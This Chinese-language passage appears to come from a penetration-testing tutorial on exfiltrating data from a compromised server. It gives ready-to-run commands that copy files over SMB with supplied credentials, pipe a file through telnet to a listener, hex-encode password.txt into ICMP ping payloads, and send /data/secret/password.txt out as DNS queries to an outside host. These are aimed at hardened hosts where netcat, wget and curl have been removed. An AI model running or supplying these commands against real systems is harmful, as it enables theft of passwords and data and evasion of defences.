通过SMB协议,在目标服务器和主机之间建立网络共享连接,然后将目标服务器上的文件做分享,接着就可以在主机端将分享的文件copy下来啦。操作的命令如下,
net use h: \xxx.xxx.xxx.xxxweb /user:{username} {password} && copy {File to Copy} h:{filename}.txt
如果telnet客户端是在远程服务器上,那么我们可以利用这个条件传输一个文件到主机的监听器上,通过以下操作命令,
telnet xxx.xxx.xxx.xxx {port} < {file to transfer}
ICMP
如果你针对的目标主机已经被加固,有的工具诸如netcat, wget 或者CURL已经被移除。那对于数据库下载来说,虽然有难度,但是还是有另外的一些技术可以用的。首先,尝试让这主机ping你的机器,然后看ICMP报文是否被防火墙过滤,如果没有被过滤,而主机底层系统又是Linux的话,我们就能够将数据通过ICMP echo请求,使用“ –p flag”来进行传输文件。
首先,我们需要将文件转换为十六进制,然后将数据插入到数据包中。这个可以通过下面的例子认识下,
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done
跟ping命令的原理相似, DNS也能被用来进行数据库下载。这次我们将用每行数据作为一个DNS查询的主机名。通过监测网络流量,可以在我们的机器上重组数据包,还原原始文件。在这个实例中,下面的命令将作为我们请求部分提交给服务器。
cat /data/secret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done